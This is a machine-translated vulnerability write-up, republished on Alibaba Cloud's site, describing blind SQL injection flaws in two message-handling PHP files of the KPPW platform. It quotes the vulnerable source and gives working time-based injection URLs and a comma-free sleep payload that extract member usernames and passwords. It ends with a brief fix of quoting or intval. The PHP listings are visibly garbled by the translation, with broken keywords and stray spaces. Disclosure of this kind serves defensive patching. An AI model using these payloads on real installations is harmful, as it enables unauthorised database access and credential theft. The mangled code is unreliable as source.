KPPW latest SQL injection vulnerability 6 (multiple blind injection scripts)

Last Update:2015-01-21 Source: Internet

Author: User

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

The latest version of kppw SQL injection vulnerability 6 has too many vulnerabilities. It must have been a lazy program with no security awareness, resulting in multiple blind injection.

Here, all vulnerabilities in the same module are submitted together to avoid exploitation of vulnerabilities.

SQL injection 1

File/control/user/message_notice.php

<? Php defined ('in _ kekeke') or exit ('Access Denied '); $ objMsgT = keke_table_class: get_instance ('witkey _ msg'); $ strUrl = 'index. php? Do = user & view = message & op = notice '; $ intPage and $ strUrl. = '& intPage = '. $ intPage; $ intPagesize and $ strUrl. = '& intPagesize = '. $ intPagesize; if (isset ($ action) {switch ($ action) {case 'mulitdel ': if ($ ckb) {$ objMsgT-> del ('msg _ id', $ ckb); kekezu: show_msg ('deleted successfully', $ strUrl, NULL, NULL, 'OK ');} else {kekezu: show_msg ('deletion failed', NULL, 'error');} break; case 'delsing': if ($ objId) {$ objMsgT-> del ('msg _ id', $ objId); kekezu: show_msg ('deleted successfully', $ strUrl, NULL, NULL, 'OK ');} else {kekezu: show_msg ('deletion failed', NULL, 'error');} break; case 'mulitview': if ($ ckb) {is_array ($ ckb) and $ strMsgId = implode (",", $ ckb); $ arrDatas = db_factory: query ("select * from ". TABLEPRE. "witkey_msg where msg_id in ($ strMsgId)"); foreach ($ arrDatas as $ v) {if ($ gUid = $ v ['to _ uid'] & $ v ['view _ status'] <1) {db_factory: execute ("update ". TABLEPRE. "witkey_msg set view_status = 1 where msg_id = ". intval ($ v ['msg _ id']) ;}} else {kekezu: show_msg ('setup failed', NULL, 'error');} kekezu: show_msg ('set successfully', $ strUrl, NULL, NULL, 'OK'); break ;}

When action = mulitView:

case 'mulitView' :if ($ckb) {is_array ( $ckb ) and $strMsgId = implode ( ",", $ckb );$arrDatas = db_factory::query ( "select * from " . TABLEPRE . "witkey_msg where msg_id in ($strMsgId)" );

When ckb exists in traversal and is an array, ckb is separated by commas and sent to the strMsgId variable. Finally, the strMsgId variable is directly imported into the SQL statement, resulting in the SQL injection vulnerability. Of course, when deleting a message, there is also an injection in the del function, which has been mentioned before. SQL injection 2 File/control/user/message_privite.php

<? Php defined ('in _ kekeke') or exit ('Access Denied '); $ objMsgT = keke_table_class: get_instance ('witkey _ msg'); $ strUrl = 'index. php? Do = user & view = message & op = private '; $ intPage and $ strUrl. = '& intPage = '. $ intPage; $ intPagesize and $ strUrl. = '& intPagesize = '. $ intPagesize; if (isset ($ action) {switch ($ action) {case 'mulitdel ': if (is_array ($ ckb) {foreach ($ ckb as $ v) {list ($ intMsgId, $ intStatus) = explode (',', $ v); if ($ intStatus = 0) {db_factory: execute ("update ". TABLEPRE. "witkey_msg set msg_status = 2 where msg_id = $ intMsgId");} else {$ objMsgT-> del ('msg _ id', $ intMsgId);} kekekezu :: show_msg ('deleted successfully', $ strUrl, NULL, NULL, 'OK');} else {kekezu: show_msg ('deletion failed', NULL, 'error');} break;

The del function also has the injection vulnerability when it is deleted. In addition, ckb enters the SQL statement through intMsgId, resulting in injection. However, one problem is that the intMsgId parameter cannot contain commas, which causes truncation and failure to execute the complete SQL statement. Here we can use a statement without a comma:

and CASE WHEN(mid((select group_concat(username,password) from keke_witkey_member) from 1 for 1)=char(97)) THEN sleep(5) ELSE (0) END

Sqk injection 1:

http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=message&op=notice&action=mulitView&ckb[]=1,2) and 1=if(mid((select concat(username,password) from keke_witkey_member limit 0,1),1,1)=char(97),sleep(5),2)%23

The returned results will be delayed. SQL injection 2:

http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=message&op=private&action=mulitDel&ckb[]=2 and CASE WHEN(mid((select group_concat(username) from keke_witkey_member) from 1 for 1)=char(97)) THEN sleep(5) ELSE (0) END,0

The returned results will be delayed. View the database execution log:

Solution:

Use single quotes or intval.

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More

KPPW latest SQL injection vulnerability 6 (multiple blind injection scripts)

Contact Us

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support